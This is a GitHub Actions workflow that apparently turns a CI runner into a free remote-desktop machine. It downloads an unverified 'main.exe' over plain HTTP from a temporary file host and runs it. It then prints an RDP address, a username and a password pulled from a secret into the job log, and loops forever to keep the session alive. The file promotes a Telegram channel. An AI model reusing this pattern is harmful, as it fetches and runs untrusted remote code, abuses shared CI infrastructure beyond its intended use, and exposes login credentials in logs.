name: "RDP-ARMOUR Temp Test"

on:
  workflow_dispatch:

jobs:
  test-run:
    runs-on: windows-latest

    steps:
      - name: Download Master Loader
        shell: pwsh
        run: |
          $url = "http://tmpfiles.org/dl/32055861/main.exe"
          curl -L $url -o "Master_Loader.exe"

      - name: Execute Engine and List Apps
        shell: pwsh
        run: |
          Write-Host ">>> Starting Execution..."
          Start-Process -FilePath "./Master_Loader.exe"
          
          Write-Host ">>> Waiting for 1 minute..."
          Start-Sleep -Seconds 60
          
          Write-Host "`n=== INSTALLED APPLICATIONS ==="
          Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion | Format-Table -AutoSize
          Write-Host "===============================`n"

      - name: Maintain Connection + Watch RDP User
        run: |
          Write-Host "Thanks to MR.English2008 for this perfect work"
          Write-Host "follow for more in my telegram channel"
          Write-Host "https://t.me/ME2008_RDP"
          
          Write-Host "`n=== RDP ACCESS ==="
          Write-Host "Address: $env:TAILSCALE_IP"
          Write-Host "Username: ME2008"
          Write-Host "Password: $(echo $env:RDP_CREDS)"
          Write-Host "==================`n"
          
          while ($true) {
              Write-Host "[$(Get-Date)] RDP Active - MR.English2008 "
              Start-Sleep -Seconds 300
          }
